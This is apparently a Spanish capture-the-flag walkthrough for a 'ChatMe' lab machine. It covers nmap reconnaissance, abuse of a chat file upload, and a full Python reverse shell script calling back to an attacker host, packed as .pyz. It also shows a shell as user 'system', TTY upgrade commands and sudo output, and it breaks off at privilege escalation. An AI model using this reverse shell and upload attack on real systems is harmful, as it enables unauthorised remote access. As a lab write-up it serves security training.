Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-29 14:50 EDT
Nmap scan report for 172.17.0.2
Host is up (0.000037s latency).
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: ChatMe - The Best Online Chat Solution
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.81 seconds
Vemos que hay un puerto 80 que hay una pagina web que no nos sirve de mucho, pero si pinchamos en una parte de la pagina o vemos el codigo descubriremos que tiene un dominio llamado chat.chatme.dl por lo que lo añadiremos al archivo hosts para que se resuelva.
nano /etc/hosts
#Dentro del nano
<IP> chat.chatme.dl
Lo guardamos y ahora probaremos a introducir en la URL lo siguiente:
URL = http://chat.chatme.dl/
Vemos que nos lleva a otra pagina donde tenemos una especie de chat en el que podemos interactuar, pero sobre todo subir archivos, veremos que nos dice gobuster.
Si lo intentamos subir, no nos da ningun mensaje de error, pero si probamos algunas de esas extensiones permitidas con nuestro archivo que subimos, veremos que se cambia automaticamente de extension.
URL = http://chat.chatme.dl/uploads/shell.png
Escalate user system
Por lo que haremos lo siguiente, la interfaz de chat nos recuerda a Whatsapp, si bien sabemos la misma aplicacion tuvo una vulnerabilidad en la que se podian subir archivos con la extension .pyz la cual se hace comprimiendo un archivo .py y se ejecutaba de forma interna pudiendo hacer practicamente lo que se quisiera, por lo que probaremos hacerlo.
nano revshell.py
#Dentro del nano
#!/bin/python3
# reverse_shell.py
import socket
import subprocess
import os
# Cambia la IP y el puerto a los de tu máquina atacante
HOST = '<IP>'
PORT = <PORT>
def reverse_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# Redirige la entrada, salida y errores al socket
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
# Inicia una shell interactiva
subprocess.call(['/bin/sh', '-i'])
reverse_shell()
Y esto nos generara el archivo revshell.pyz el cual subiremos a la pagina dandole a Browser y despues a Send.
Solo tendremos que esperar entorno a 1 minuto para que nos de la shell y ya estariamos dentro de la maquina como el usuario system.
listening on [any] 7777 ...
connect to [192.168.28.5] from (UNKNOWN) [172.17.0.2] 47632
/bin/sh: 0: can't access tty; job control turned off
$ whoami
system
Sanitizar la shell (TTY)
script /dev/null -c bash
# <Ctrl> + <z>
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
# Para ver las dimensiones de nuestra consola en el Host
stty size
# Para redimensionar la consola ajustando los parametros adecuados
stty rows <ROWS> columns <COLUMNS>
Escalate Privileges
Si hacemos sudo -l veremos lo siguiente:
Matching Defaults entries for system on 5f8ab1ba9349:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User system may run the following commands on 5f8ab1ba9349:
(ALL : ALL) NOPASSWD: /usr/bin/procmail